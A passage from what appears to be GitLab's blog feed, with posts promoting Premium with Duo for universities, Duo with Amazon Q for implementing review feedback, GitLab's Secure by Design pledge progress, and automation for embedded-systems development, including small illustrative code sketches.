        <content type="html"><![CDATA[<p>Educational institutions increasingly rely on modern software development practices to support teaching, research, and administrative functions. As development needs grow more complex in university and college environments, GitLab Premium with Duo provides essential capabilities that address the unique challenges faced by higher education – particularly around open source development, remote collaboration, and enterprise-grade security.</p>
<p>GitLab's comprehensive, intelligent DevSecOps platform delivers value that extends far beyond fundamental version control. Built on an open source foundation with enterprise-grade features, GitLab Premium helps prevent costly security incidents involving student data, provides cloud-based development environments for distributed teams, and offers the professional support that educational institutions need for mission-critical systems. And now <a href="https://about.gitlab.com/blog/gitlab-premium-with-duo/">Premium includes GitLab Duo AI essentials</a> Code Suggestions and Chat at no additional cost.</p>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1083723619?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;GitLab Premium with Duo Core&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;</p>
<h2>The unique development environment in higher education</h2>
<p>Universities and colleges operate in a distinctly challenging technical environment. Development teams must support multidisciplinary collaboration across technical and non-technical departments while managing vast amounts of sensitive data – from student records and financial information to research findings and faculty evaluations.</p>
<p>Most institutions face these challenges with limited IT resources, yet must support thousands of concurrent users across numerous projects and research initiatives. Research integrity requirements add another layer of complexity, as development work often needs to maintain traceability and reproducibility standards.</p>
<h2>Premium solutions for educational institutions</h2>
<p>GitLab Premium with Duo has the functionality that higher education needs.</p>
<h3>Enhanced collaboration and workflow capabilities</h3>
<p>Cross-departmental projects are common in educational settings – from multi-department research initiatives to custom module development for systems like Ellucian Banner, an enterprise resource planning application used by higher education. These complex projects require sophisticated workflow management that goes beyond basic version control.</p>
<p>GitLab Premium addresses these challenges with powerful collaboration and project visualization features, including epics, roadmaps, and advanced Kanban boards for Agile development workflows. When you assign multiple approvers to certain merge requests and protected branches, you ensure higher code quality and accountability across teams. These tools allow institutions to coordinate work across departments while aligning with institution-wide objectives – essential for managing multiphase campus technology initiatives.</p>
<p>In Australia, <a href="https://about.gitlab.com/customers/deakin-university/">Deakin University’s</a> enablement team uses GitLab to build standardized processes and reusable templates — such as custom merge request templates, templated build pipelines, and a security and compliance framework — that can be shared with the broader university community and citizen developers, driving innovation and collaboration both inside the university and with key partners. “We were trying to bring in a community of practice and help it thrive for quite some time, but we were never successful until we had this tool,” said Aaron Whitehand, director of Digital Enablement at Deakin University.</p>
<blockquote>
<h4>Read more about <a href="https://about.gitlab.com/customers/deakin-university/">how Deakin University uses GitLab to drive improvements</a> in collaboration and productivity, including a 60% reduction in manual tasks.</h4>
</blockquote>
<h3>Advanced data protection and governance</h3>
<p>Educational institutions generate and manage vast amounts of data, ranging from student records and financial information to research findings and faculty evaluations. The security stakes are particularly high. The <a href="https://universitybusiness.com/in-just-3-months-this-data-breach-has-compromised-nearly-900-institutions/">2023 MOVEit breach</a>, which spanned three months and compromised approximately 900 educational institutions, exposed the sensitive information of more than 62 million people. This demonstrates the critical need for proactive security measures integrated directly into higher education development workflows.</p>
<p>Vulnerability scanning stops code releases that contain security risks, enabling institutions to establish and enforce governance protocols that protect sensitive information. These capabilities help universities implement proper access controls and permission structures for research databases, creating a secure framework where authorized researchers maintain appropriate access – effectively balancing robust protection with necessary collaboration.</p>
<p>GitLab is built from the ground up to secure your source code. Scalable Git-based repositories, granular access controls, and built-in compliance features eliminate bottlenecks in your workflow while meeting security requirements. GitLab Premium provides audit tracking and compliance capabilities essential for educational environments. Complete audit trails capture detailed logs of all code changes, access attempts, and system modifications with timestamps and user attribution. Full change management documentation ensures traceability of who made what changes, when, and why – critical for research integrity – while access control auditing monitors repository access and permissions changes.</p>
<h3>Cloud-based development environments and remote collaboration</h3>
<p>Modern educational institutions require flexible development environments that support distributed teams, remote learning scenarios, and diverse technical requirements. GitLab Premium provides:</p>
<ul>
<li><strong><a href="https://docs.gitlab.com/user/workspace/">GitLab Workspaces</a>:</strong> Cloud-based development environments accessible from any device</li>
<li><strong><a href="https://docs.gitlab.com/user/project/web_ide/">Web IDE integration</a>:</strong> Browser-based coding with full GitLab feature integration</li>
<li><strong><a href="https://about.gitlab.com/blog/build-and-run-containers-in-remote-development-workspaces/">Container-based development</a>:</strong> Consistent, reproducible development environments across different projects and user groups</li>
</ul>
<p>These capabilities are particularly valuable for supporting remote and hybrid learning models, enabling students and researchers to access standardized development environments regardless of their physical location or local hardware constraints.</p>
<h3>Professional support for critical systems</h3>
<p>Small IT teams in educational settings often support large, complex infrastructure with minimal resources. Reaching out to user forums for answers doesn't always mean you'll get an accurate reply and isn't efficient for large teams. GitLab Premium includes dedicated professional support, providing faster issue resolution and upgrade assistance during critical periods like class enrollment or research deadlines.</p>
<p>This minimizes downtime for critical services and ensures continuity of operations during peak usage periods, giving stretched IT departments the enterprise-grade reliability they need for essential academic systems.</p>
<h3>Built on open source with enterprise capabilities</h3>
<p>Open source software is developed collaboratively in a public manner, with source code freely available for anyone to view, modify, and distribute. This development model fosters innovation through community contributions and ensures transparency in how software functions. GitLab's open source foundation resonates strongly with educational institutions' values around collaboration, transparency, and community contribution. GitLab Premium features extend this foundation with enterprise-grade capabilities while maintaining the ability to contribute back to the open source ecosystem.</p>
<p>Key open source advantages include:</p>
<ul>
<li><strong>Transparency:</strong> Complete visibility into platform capabilities and security measures – you can examine exactly how the software works</li>
<li><strong>Community contribution:</strong> Ability to contribute improvements back to the broader community and benefit from global developer expertise</li>
<li><strong>Vendor independence:</strong> Reduced lock-in risk with open source alternatives and the freedom to modify code as needed</li>
<li><strong>Co-creation opportunities:</strong> Collaborative development with the broader community, including other educational institutions, to build shared solutions</li>
</ul>
<h3>AI assistant for software development tasks</h3>
<p>GitLab Premium with <a href="https://about.gitlab.com/gitlab-duo/">Duo</a> brings powerful AI-native capabilities directly into the development workflow, including:</p>
<ul>
<li><a href="https://docs.gitlab.com/user/project/repository/code_suggestions/"><strong>Code Suggestions</strong></a>, which provides real-time code completion and suggestions, helping developers write code faster and more efficiently</li>
<li><a href="https://docs.gitlab.com/user/gitlab_duo_chat/"><strong>Chat</strong></a>, which allows team members to get instant answers to questions, troubleshoot issues, and access documentation directly within the GitLab environment</li>
</ul>
<p>These AI tools significantly enhance productivity, reduce errors, and streamline collaboration, making GitLab Premium an even more valuable asset for software development teams in higher education.</p>
<h3>Transparency at the core</h3>
<p>Higher education institutions handle incredibly sensitive data — from student records and research findings to proprietary academic work and federal grant information.</p>
<p>The <a href="https://about.gitlab.com/ai-transparency-center/">GitLab AI Transparency Center </a>demonstrates our commitment to transparency, accountability, and protection of customer data and intellectual property, providing the privacy guarantees that educational institutions require.</p>
<p>GitLab launched the AI Transparency Center to help customers, community, and team members better understand how GitLab upholds ethics and transparency in our AI-powered features.</p>
<p>Our publicly available documentation highlights the comprehensive measures we take to protect your institution's data and intellectual property. <a href="https://handbook.gitlab.com/handbook/legal/ethics-compliance-program/ai-ethics-principles/">GitLab's AI Ethics Principles for Product Development</a> guide us as we continue to build and evolve our AI functionality, helping higher education organizations harness the promise of AI while maintaining complete control and oversight of their most valuable information assets.</p>
<h2>Get started with GitLab Premium today</h2>
<p>For educational institutions, GitLab Premium with Duo represents a strategic technical investment that combines the benefits of open source development with enterprise-grade, AI-native capabilities. By providing professional-grade tools ready for the challenges familiar to the complex technical environment of higher education, GitLab Premium with Duo helps institutions address security vulnerabilities, streamline development workflows, and maintain the reliable infrastructure that academic and research operations depend on.</p>
<blockquote>
<p><a href="https://about.gitlab.com/solutions/public-sector/">Learn more about GitLab for Public Sector</a> or  <a href="https://about.gitlab.com/sales/">speak to our sales team today</a>.</p>
</blockquote>
<h2>Read more</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/gitlab-premium-with-duo/">Unlocking AI for every GitLab Premium and Ultimate customer</a></li>
<li><a href="https://docs.gitlab.com/user/project/repository/code_suggestions/">GitLab Duo Code Suggestions</a></li>
<li><a href="https://docs.gitlab.com/user/gitlab_duo_chat/">GitLab Duo Chat</a></li>
</ul>
]]></content>
        <author>
            <name>Jessica Hurwitz</name>
            <uri>https://about.gitlab.com/blog/authors/jessica-hurwitz</uri>
        </author>
        <author>
            <name>Elisabeth Burrows</name>
            <uri>https://about.gitlab.com/blog/authors/elisabeth-burrows</uri>
        </author>
        <published>2025-06-10T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Speed up code reviews: Let AI handle the feedback implementation]]></title>
        <id>https://about.gitlab.com/blog/speed-up-code-reviews-let-ai-handle-the-feedback-implementation/</id>
        <link href="https://about.gitlab.com/blog/speed-up-code-reviews-let-ai-handle-the-feedback-implementation/"/>
        <updated>2025-06-10T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>You know that feeling when you've just submitted a merge request and the code review comments start rolling in? One reviewer wants the labels updated, another asks for side-by-side layouts, someone else requests bold formatting, and don't forget about that button color change. Before you know it, you're spending hours implementing feedback that, while important, takes you away from building new features. It's a time-consuming process that every developer faces, yet it feels like there should be a better way.</p>
<p>What if you could have an AI assistant that understands code review feedback and automatically implements the changes for you? That's exactly what <a href="https://about.gitlab.com/blog/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/">GitLab Duo with Amazon Q</a> brings to your development workflow. This seamless integration combines GitLab's comprehensive DevSecOps platform with Amazon Q's advanced AI capabilities, creating an intelligent assistant that can read reviewer comments and convert them directly into code changes. Instead of manually addressing each piece of feedback, you can let AI handle the implementation while you focus on the bigger picture.</p>
<h2>How GitLab Duo with Amazon Q works</h2>
<p>When you're viewing a merge request with reviewer comments, you'll see feedback scattered throughout your code. Let's take the examples from earlier in this article: maybe you've received a request to update a form label here, a suggestion to display fields side-by-side there, or a note about making certain text bold. Each comment represents a task that normally you'd need to handle manually.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673634/Blog/Content%20Images/1-show-comment.png" alt="feedback on an MR"></p>
<p>With GitLab Duo with Amazon Q, you can simply enter the <code>/q dev</code> quick action in a comment. This prompts Amazon Q to analyze all the feedback and start modifying your code automatically. The AI agent understands the context of each comment and implements the requested changes directly in your codebase.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673634/Blog/Content%20Images/2-invoke-q-dev.png" alt="/q dev function prompting Amazon Q to analyze feedback"></p>
<p>Once Amazon Q processes the feedback, you can view all the updates in the &quot;Changes&quot; tab of your merge request. Every modification is clearly visible, so you can verify that the AI agent correctly interpreted and implemented each piece of feedback. You can then run your updated application to confirm that all the changes work as expected — that form label is updated, the fields are displayed side-by-side, the text is bold, and yes, that button is now blue.</p>
<p>Watch the code review feedback process in action:</p>
<p>&lt;!-- blank line --&gt;
&lt;figure class=&quot;video_container&quot;&gt;
&lt;iframe src=&quot;https://www.youtube.com/embed/31E9X9BrK5s?si=ThFywR34V3Bfj1Z-&quot; frameborder=&quot;0&quot; allowfullscreen=&quot;true&quot;&gt; &lt;/iframe&gt;
&lt;/figure&gt;
&lt;!-- blank line --&gt;</p>
<p>Processing code review feedback is a necessary but time-intensive part of software development. GitLab Duo with Amazon Q transforms this manual process into an automated workflow, dramatically reducing the time between receiving feedback and implementing changes. By letting AI handle these routine modifications, you're free to focus on what really matters — building innovative features and solving complex problems.</p>
<p>With GitLab Duo with Amazon Q, you can:</p>
<ul>
<li>Eliminate hours of manual feedback implementation</li>
<li>Accelerate your code review cycles</li>
<li>Maintain consistency in how feedback is addressed</li>
<li>Reduce context switching between reviewing comments and writing code</li>
<li>Ship features faster with streamlined deployment times</li>
</ul>
<blockquote>
<h4>To learn more about GitLab Duo with Amazon Q, visit us at an upcoming <a href="https://about.gitlab.com/events/aws-summits/">AWS Summit in a city near you</a> or <a href="https://about.gitlab.com/partners/technology-partners/aws/#form">reach out to your GitLab representative</a>.</h4>
</blockquote>
<h2>GitLab Duo with Amazon Q resources</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/">GitLab Duo with Amazon Q: Agentic AI optimized for AWS generally available</a></li>
<li><a href="https://about.gitlab.com/partners/technology-partners/aws/">GitLab and AWS partner page</a></li>
<li><a href="https://docs.gitlab.com/user/duo_amazon_q/">GitLab Duo with Amazon Q documentation</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/">What is agentic AI?</a></li>
<li><a href="https://about.gitlab.com/blog/agentic-ai-guides-and-resources/">Agentic AI guides and resources</a></li>
</ul>
]]></content>
        <author>
            <name>Cesar Saavedra</name>
            <uri>https://about.gitlab.com/blog/authors/cesar-saavedra</uri>
        </author>
        <published>2025-06-10T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Last year we signed the Secure by Design pledge - here's our progress]]></title>
        <id>https://about.gitlab.com/blog/last-year-we-signed-the-secure-by-design-pledge-heres-our-progress/</id>
        <link href="https://about.gitlab.com/blog/last-year-we-signed-the-secure-by-design-pledge-heres-our-progress/"/>
        <updated>2025-06-09T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>A little over a year ago, GitLab signed <a href="https://about.gitlab.com/blog/secure-by-design-principles-meet-devsecops-innovation-in-gitlab-17/">CISA’s Secure by Design Pledge</a>, a directive for technology providers to embed security at the heart of their products from the outset of development. Since then, we've made significant progress towards improving our security posture and creating a more secure ecosystem for our customers to develop secure software faster.</p>
<h2>Meeting the security goals</h2>
<p>Let’s explore the additions and improvements we've made to further enhance security across the development lifecycle.</p>
<h3>Multi-factor authentication (MFA)</h3>
<p><em><strong>Goal: Within one year of signing the pledge, demonstrate actions taken to measurably increase the use of multi-factor authentication across the manufacturer’s products.</strong></em></p>
<p>GitLab currently offers multiple <a href="https://docs.gitlab.com/ee/user/profile/account/two_factor_authentication.html">MFA</a> options for users to secure their accounts. We also offer SSO functionality to enable <a href="https://docs.gitlab.com/ee/user/group/saml_sso/">GitLab.com</a>, <a href="https://docs.gitlab.com/integration/saml/">Self-Managed</a>, and <a href="https://docs.gitlab.com/integration/saml/">GitLab Dedicated</a> customers to streamline their authentication processes and enforce their internal MFA requirements.</p>
<p>To further enhance the platform’s resilience, and to create a more secure foundation for our customers, GitLab is executing a phased MFA by Default rollout.</p>
<p>In the coming months, we will deploy changes requiring all customers to enable MFA on their accounts.</p>
<p>For customers who already have MFA enabled or who authenticate to GitLab via their organization’s single sign-on (SSO) method, no changes are necessary. Customers who do not already have MFA enabled and do not authenticate via their organization’s SSO method will be required to enable MFA and enroll in one or more of the available MFA methods.</p>
<p>The MFA rollout will occur in stages to ensure a smooth and consistent adoption across all customers. More details on GitLab’s MFA by Default rollout will be shared in the near future.</p>
<h3>Default passwords</h3>
<p><em><strong>Goal: Within one year of signing the pledge, demonstrate measurable progress towards reducing default passwords across the manufacturers’ products.</strong></em></p>
<p>To reduce the use of default passwords, GitLab uses randomly generated root passwords for its multiple installation methods. GitLab’s multi-method <a href="https://docs.gitlab.com/ee/install/install_methods.html">installation instructions</a> also include guidance on how to change the randomly generated root password for each installation.</p>
<p>For some install methods, such as installing GitLab in a Docker container, the file containing the initial root password is deleted on the first container restart after 24 hours, to further harden the GitLab instance.</p>
<h3>Reducing entire classes of vulnerabilities</h3>
<p><em><strong>Goal: Within one year of signing the pledge, demonstrate actions taken towards enabling a significant measurable reduction in the prevalence of one or more vulnerability classes across the manufacturer’s products.</strong></em></p>
<p>GitLab has published <a href="https://docs.gitlab.com/ee/development/secure_coding_guidelines.html#sast-coverage">secure coding guidelines</a> on its documentation site, which describe, and give guidance for addressing, security vulnerabilities commonly identified in the GitLab codebase.</p>
<p>The guidelines are “intended to help developers identify potential security vulnerabilities early, with the goal of reducing the number of vulnerabilities released over time.”</p>
<p>GitLab continues to improve its <a href="https://docs.gitlab.com/development/secure_coding_guidelines#sast-coverage">SAST rule coverage</a> to address broader sets of security vulnerabilities for itself and its customers.</p>
<h3>Security patches</h3>
<p><em><strong>Goal: Within one year of signing the pledge, demonstrate actions taken to measurably increase the installation of security patches by customers.</strong></em></p>
<p>GitLab handles all updates related to its GitLab.com and GitLab Dedicated service offerings. Additionally, GitLab publishes a <a href="https://docs.gitlab.com/ee/policy/maintenance.html">maintenance policy</a>, which outlines its approach to releasing updates, backporting fixes, upgrade recommendations, and supporting documentation.</p>
<p>GitLab’s documentation has comprehensive guidance on <a href="https://docs.gitlab.com/ee/update/?tab=Self-compiled+%28source%29#upgrade-based-on-installation-method">how to upgrade</a> self-managed instances based on their deployment model. This includes Omnibus, Helm chart, Docker and self-compiled GitLab installations.</p>
<p>GitLab also provides a detailed <a href="https://docs.gitlab.com/ee/update/plan_your_upgrade.html">upgrade plan</a> to ensure proper testing and troubleshooting can be performed as well as rollback plans if necessary.</p>
<p>Depending on the version upgrade, specific changes (<a href="https://docs.gitlab.com/ee/update/versions/gitlab_17_changes.html">example for GitLab 17</a>) for each version are highlighted to ensure a smooth upgrade process and limit unavailability of services.</p>
<h3>Vulnerability disclosure policy</h3>
<p><em><strong>Goal: Within one year of signing the pledge, publish a vulnerability disclosure policy (VDP).</strong></em></p>
<p>GitLab maintains a strong bug bounty program through <a href="https://hackerone.com/gitlab?type=team">HackerOne</a>, a <a href="https://gitlab.com/.well-known/security.txt">security.txt</a> file highlighting GitLab’s preferred and additional disclosure processes, and <a href="https://about.gitlab.com/releases/categories/releases/">release posts</a> highlighting security fixes.</p>
<p>Customers and the general public can subscribe to receive GitLab’s release posts directly in their email inbox.</p>
<h3>Common Vulnerabilities and Exposures</h3>
<p><em><strong>Goal: Within one year of signing the pledge, demonstrate transparency in vulnerability reporting.</strong></em></p>
<p>GitLab includes the Common Weakness Enumeration (CWE) field in all Common Vulnerabilities and Exposures (CVE) records it publishes. Over the past year, GitLab has iterated to also include the Common Platform Enumeration (CPE) field in CVE records.</p>
<p>The GitLab <a href="https://gitlab.com/gitlab-org/cves">CVE assignments project</a> stores a copy of all CVE identifiers assigned and published by GitLab in its role as a CVE Numbering Authority.</p>
<blockquote>
<p>Check out <a href="https://gitlab.com/gitlab-org/cves/-/blob/master/.gitlab/issue_templates/Internal%20GitLab%20Submission.md?ref_type=heads">GitLab’s CVE submission template</a>.</p>
</blockquote>
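<p>For illustration, here is an abridged sketch, as a Python dictionary, of where those fields live in a CVE record using the CVE JSON 5.x format. The identifiers and values below are hypothetical placeholders, not a real GitLab advisory.</p>
<pre><code class="language-python"># Abridged, hypothetical CVE JSON 5.x record showing where the CWE and
# CPE fields described above appear.
cve_record = {
    "cveMetadata": {
        "cveId": "CVE-2025-00000",        # placeholder identifier
        "assignerShortName": "GitLab",    # GitLab acting as a CVE Numbering Authority
    },
    "containers": {
        "cna": {
            "problemTypes": [{
                "descriptions": [{
                    "type": "CWE",
                    "lang": "en",
                    "cweId": "CWE-79",    # Common Weakness Enumeration field
                    "description": "Cross-site Scripting (XSS)",
                }]
            }],
            "affected": [{
                "vendor": "GitLab",
                "product": "GitLab",
                # Common Platform Enumeration (CPE) field
                "cpes": ["cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*"],
            }],
        }
    },
}

# Pull out the CWE and CPE entries the way a feed consumer might.
cwe = cve_record["containers"]["cna"]["problemTypes"][0]["descriptions"][0]["cweId"]
cpes = cve_record["containers"]["cna"]["affected"][0]["cpes"]
print(cwe, cpes[0])
</code></pre>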
<h3>Evidence of intrusions</h3>
<p><em><strong>Goal: Within one year of signing the pledge, demonstrate a measurable increase in the ability for customers to gather evidence of cybersecurity intrusions affecting the manufacturer’s products.</strong></em></p>
<p>GitLab has published an <a href="https://docs.gitlab.com/ee/security/responding_to_security_incidents.html">incident response guide</a> to help customers respond to incidents involving GitLab instances. Additionally, GitLab has open sourced versions of its <a href="https://about.gitlab.com/blog/unveiling-the-guard-framework-to-automate-security-detections-at-gitlab/">GUARD detection-as-code</a> and TLDR threat detection frameworks. The repositories for those open source frameworks can be found on <a href="https://about.gitlab.com/security/open-source-resources/">GitLab’s Open Source Security Center</a>.</p>
<p>In a similar manner, GitLab is adding functionality to its <a href="https://gitlab.com">GitLab.com</a> service offering to <a href="https://about.gitlab.com/blog/introducing-compromised-password-detection-for-gitlab-com/">detect compromised passwords</a> for all logins using GitLab’s native username and password authentication method.</p>
<h2>What's next</h2>
<p><a href="https://gitlab.com/gitlab-com/gl-security">GitLab’s Security Division’s mission</a> is to enable everyone to innovate and succeed on a safe, secure, and trusted DevSecOps platform.</p>
<p>GitLab's security enhancements over the past year have allowed us to demonstrate our commitment to CISA’s Secure by Design Pledge, and they have strengthened our platform and given customers a more reliable and secure foundation to build on.</p>
<p>Our commitment to iteration means we're already focused on the next set of innovations that will drive us forward.</p>
<blockquote>
<p>To learn more about GitLab’s security enhancements, bookmark our <a href="https://about.gitlab.com/blog/categories/security/">security page on the GitLab Blog</a>.</p>
</blockquote>
<h2>Read more</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/secure-by-design-principles-meet-devsecops-innovation-in-gitlab-17/">Secure by Design principles meet DevSecOps innovation in GitLab 17</a></li>
<li><a href="https://about.gitlab.com/blog/happy-birthday-secure-by-design/">Happy birthday, Secure by Design!</a></li>
<li><a href="https://about.gitlab.com/the-source/security/strengthen-your-cybersecurity-strategy-with-secure-by-design/">Strengthen your cybersecurity strategy with Secure by Design</a></li>
</ul>
]]></content>
        <author>
            <name>Joseph Longo</name>
            <uri>https://about.gitlab.com/blog/authors/joseph-longo</uri>
        </author>
        <published>2025-06-09T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[4 ways to accelerate embedded development with GitLab]]></title>
        <id>https://about.gitlab.com/blog/4-ways-to-accelerate-embedded-development-with-gitlab/</id>
        <link href="https://about.gitlab.com/blog/4-ways-to-accelerate-embedded-development-with-gitlab/"/>
        <updated>2025-06-05T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Software in embedded systems is no longer just a part number — it's a critical differentiator. This shift has led to enormous complexity in the firmware running in our cars, airplanes, and industrial machines. The number of lines of code in the average car is expected to reach <a href="https://www.statista.com/statistics/1370978/automotive-software-average-lines-of-codes-per-vehicle-globally/">650 million</a> by the end of 2025, up from 200 million just five years ago. In aerospace systems, the complexity of embedded software has nearly <a href="https://www.mckinsey.com/industries/aerospace-and-defense/our-insights/debugging-the-software-talent-gap-in-aerospace-and-defense">doubled every four years</a> for the last several decades.</p>
<p>Traditional embedded development approaches cannot effectively handle the software challenges of modern machines. This shortcoming slows engineers down, in part, by exacerbating challenges such as:</p>
<ul>
<li><a href="#challenge-1-hardware-testing-bottlenecks">Hardware testing bottlenecks</a></li>
<li><a href="#challenge-2-inconsistent-build-environments">Inconsistent build environments</a></li>
<li><a href="#challenge-3-siloed-development-practices">Siloed development practices</a></li>
<li><a href="#challenge-4-manual-functional-safety-compliance-processes">Manual functional safety compliance processes</a></li>
</ul>
<p>Embedded developers need a new approach to deal with the rapid increase in code. In this article, we’ll explain four ways you can use the GitLab AI-native DevSecOps platform to shorten feedback loops, work collaboratively and iteratively, and streamline compliance.</p>
<h2>Challenge 1: Hardware testing bottlenecks</h2>
<p>Unlike enterprise software that can run on virtually any cloud server, embedded automotive software must be tested on specialized hardware that precisely matches production environments. Traditional hardware-in-the-loop (HIL) testing processes often follow this pattern:</p>
<ol>
<li>Developers write code for an embedded system (e.g., an electronic control unit)</li>
<li>They request access to limited, expensive hardware test benches (costing $500,000-$10M each)</li>
<li>They wait days or weeks for their scheduled access window</li>
<li>They manually deploy and test their code on physical hardware at their desks</li>
<li>They document results, pass the hardware to the next developer, and go to the back of the hardware testing queue</li>
</ol>
<p>This process is extremely inefficient. Embedded developers may finish writing their code today and wait weeks to test it on a hardware target. By then, they've moved on to other tasks. This context switching drains productivity. Not only that, developers may wait weeks to learn they had a simple math error in their code.</p>
<h3>Solution: Automated hardware allocation and continuous integration</h3>
<p>You can streamline hardware testing through automation using the <a href="https://gitlab.com/guided-explorations/embedded/ci-components/device-cloud">GitLab On-Premises Device Cloud</a>, a CI/CD component. This lets you automate the orchestration of scarce hardware resources, turning a manual, time-intensive process into a streamlined, continuous workflow.</p>
<p>The On-Premises Device Cloud:</p>
<ol>
<li>Creates pools of shared hardware resources</li>
<li>Automatically — and exclusively — allocates hardware to a developer’s hardware testing pipeline tasks based on availability</li>
<li>Deploys and executes tests without manual intervention</li>
<li>Collects and reports results through integrated pipelines</li>
<li>Automatically deallocates hardware back into the “available” pool</li>
</ol>
<p>After submitting code, you’ll receive results in hours instead of days, often without ever physically touching the test hardware.</p>
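<p>The five-step allocate/test/deallocate cycle above can be sketched as a small exclusive-access device pool. This is only an illustration of the idea, not the actual On-Premises Device Cloud implementation; all names here are hypothetical.</p>
<pre><code class="language-python">import threading
from contextlib import contextmanager

class DevicePool:
    """Hypothetical sketch of a shared hardware pool with exclusive allocation."""

    def __init__(self, devices):
        self._available = list(devices)
        self._freed = threading.Condition()

    @contextmanager
    def acquire(self, timeout=None):
        with self._freed:
            # Block until a test bench is free, so each pipeline job gets
            # exclusive access to exactly one device.
            while not self._available:
                if not self._freed.wait(timeout=timeout):
                    raise TimeoutError("no test hardware available")
            device = self._available.pop()
        try:
            yield device
        finally:
            with self._freed:
                # Deallocate: return the device to the "available" pool.
                self._available.append(device)
                self._freed.notify()

pool = DevicePool(["hil-bench-01", "hil-bench-02"])
with pool.acquire() as bench:
    result = f"tests passed on {bench}"
print(result)
</code></pre>
<p>A CI job would wrap its flash-and-test steps in the <code>acquire()</code> block, so the hardware returns to the pool even when a test fails.</p>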
<p>Watch this video for an introduction to the GitLab On-Premises Device Cloud CI/CD component, which orchestrates the remote allocation of shared hardware for HIL testing:</p>
<figure class="video_container">
<iframe src="https://www.youtube.com/embed/ltr2CIM9Zag?si=NOij3t1YYz4zKajC" frameborder="0" allowfullscreen="true"></iframe>
</figure>
<p>You can also adopt multi-pronged testing strategies that balance speed and quality. Bring the following embedded test patterns and environments into automated GitLab CI pipelines:</p>
<ul>
<li><strong>Software-in-the-loop (SIL):</strong> Testing on virtual hardware simulators for quicker initial feedback</li>
<li><strong>Processor-in-the-loop (PIL):</strong> Testing on representative processor hardware for faster feedback at a lower cost</li>
<li><strong>Hardware-in-the-loop (HIL):</strong> Testing on full production-equivalent hardware and test benches for late-stage verification</li>
</ul>
<p>By automating the orchestration of these tests within CI pipelines, you’ll be able to identify issues earlier, iterate faster, and accelerate time to market.</p>
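<p>One way to encode the tiered strategy above is a simple policy mapping pipeline triggers to test tiers: cheap simulated tests on every push, scarce physical hardware only where it pays off. The trigger names below are hypothetical examples, not GitLab CI keywords.</p>
<pre><code class="language-python"># Hypothetical tiered test-selection policy for the SIL/PIL/HIL strategy above.
TEST_TIERS = {
    "push":          ["SIL"],                # fast virtual feedback on every commit
    "merge_request": ["SIL", "PIL"],         # add representative processors pre-merge
    "main_branch":   ["SIL", "PIL", "HIL"],  # full test-bench verification late-stage
}

def tiers_for(trigger):
    """Return which in-the-loop test tiers a pipeline trigger should run."""
    return TEST_TIERS.get(trigger, ["SIL"])

print(tiers_for("merge_request"))
</code></pre>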
<h2>Challenge 2: Inconsistent build environments</h2>
<p>Another significant challenge in embedded development is build environment inconsistency. Embedded developers often execute builds manually on their local machines with varying configurations, compiler versions, and dependencies, then copy the resulting binaries from their local builds into a shared repository.</p>
<p>This approach creates several problems:</p>
<ul>
<li><strong>Inconsistent outputs:</strong> Builds for the same source code produce different results on different machines</li>
<li><strong>&quot;Works on my machine&quot; syndrome:</strong> Code that builds locally fails in shared environments</li>
<li><strong>Poor traceability:</strong> Limited audit trail of who built what and when</li>
<li><strong>Knowledge silos:</strong> Build expertise becomes concentrated in a few individuals</li>
</ul>
<p>This approach can lead to errors, bottlenecks, and costly delays.</p>
<h3>Solution: Standardized build automation</h3>
<p>You can address these challenges by implementing standardized build automation within CI/CD pipelines in GitLab. This approach creates consistent, repeatable, container-based build environments that eliminate machine-specific variations. Through the use of special Embedded Gateway Runner provisioning scripts, containers can interface with hardware for flashing and port monitoring for automated testing.</p>
<p>Key elements of this solution include:</p>
<ul>
<li><strong>Lifecycle managed environments:</strong> Define complex embedded simulation environments as code; automatically deploy environments for testing and destroy them afterward</li>
<li><strong>Containerization:</strong> Use Docker containers to ensure identical build environments</li>
<li><strong>Automated dependency management:</strong> Control and version all dependencies</li>
<li><strong>Central build execution:</strong> Run builds on shared infrastructure rather than local machines</li>
</ul>
<blockquote>
<p>Follow this tutorial to learn <a href="https://gitlab.com/guided-explorations/embedded/workshops/embedded-devops-workshop-refactoring-to-ci/-/blob/main/TUTORIAL2.md">how to automate embedded software builds within a GitLab CI pipeline</a>.</p>
</blockquote>
<p>By standardizing and automating the build process, you can ensure that every build follows the same steps with the same dependencies, producing consistent outputs regardless of who initiated it. This not only improves quality but also democratizes the build process, enabling more team members to participate without specialized knowledge.</p>
<h2>Challenge 3: Siloed development practices</h2>
<p>Enterprise development teams have widely adopted collaborative practices such as DevOps, underpinned by shared source code management (SCM) and continuous integration/continuous delivery (CI/CD) systems. Embedded developers, on the other hand, have historically worked alone at their desks. There are valid technical reasons for this.</p>
<p>For example, consider hardware virtualization, which is a key enabler of DevOps automation. The industry has been slower to virtualize the massive range of specialized processors and boards used in embedded systems. This is due in large part to the difficulties of virtualizing production real-time systems and the associated lack of economic incentives. Compare that to cloud virtualization which has been commoditized and benefited enterprise SaaS development for over a decade.</p>
<p>Many providers are now embracing virtualization-first for the sake of speeding up embedded development. If teams fail to adopt virtual testing options, however, their silos will remain and negatively impact the business through:</p>
<ul>
<li><strong>Knowledge fragmentation</strong>: Critical insights remain scattered across individuals and teams</li>
